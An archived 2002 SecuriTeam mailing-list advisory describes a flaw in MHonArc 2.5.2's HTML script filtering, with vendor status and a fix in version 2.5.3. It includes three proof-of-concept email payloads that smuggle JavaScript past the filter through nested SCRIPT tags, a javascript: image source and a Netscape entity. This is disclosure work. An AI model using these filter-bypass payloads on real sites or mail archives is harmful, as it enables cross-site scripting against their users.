[UNIX] MHonArc Script Filtering Bypass Vulnerability
From: support@securiteam.comDate: 04/21/02
- Previous message: support@securiteam.com: "[NEWS] User Privileges Vulnerability in Oracle9i Database Server"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Sun, 21 Apr 2002 21:06:49 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
MHonArc Script Filtering Bypass Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://www.mhonarc.org/> MHonArc has a feature that filters out
scripting tags from incoming HTML mails (it is enabled by default). This
feature has been found to contain a vulnerability where some variations of
scripting tags will not be filtered. This will cause the execution of the
hostile JavaScript (in the case of when the scripting tags are JavaScript
tags, as in the example).
DETAILS
Vulnerable systems:
MHonArc version 2.5.2
Immune systems:
MHonArc version 2.5.3
Exploit 1:
From: test@example.com
To: test@example.com
Date: Sun, 16 Dec 2001 00:00:00 +0900
Subject: test
MIME-Version: 1.0
Content-Type: text/html
<HTML>
<SCR<SCRIPT></SCRIPT>IPT>alert(document.domain)</SCR<SCRIPT></SCRIPT>IPT>
</HTML>
Exploit 2:
From: test@example.com
To: test@example.com
Date: Sun, 16 Dec 2001 00:00:00 +0900
Subject: test
MIME-Version: 1.0
Content-Type: text/html
<HTML>
<IMG SRC=javascript:alert(document.domain)>
</HTML>
Exploit 3:
From: test@example.com
To: test@example.com
Date: Sun, 16 Dec 2001 00:00:00 +0900
Subject: test
MIME-Version: 1.0
Content-Type: text/html
<HTML>
<B foo=&{alert(document.domain)};>
Vulnerable only if Netscape 4.x is used to browse.</B>
</HTML>
Vendor Status:
The author was contacted on December 16, 2001. The fixed version was
released on April 18, 2002.
ADDITIONAL INFORMATION
The information has been provided by <mailto:takagi.hiromitsu@aist.go.jp>
TAKAGI, Hiromitsu.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] User Privileges Vulnerability in Oracle9i Database Server"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
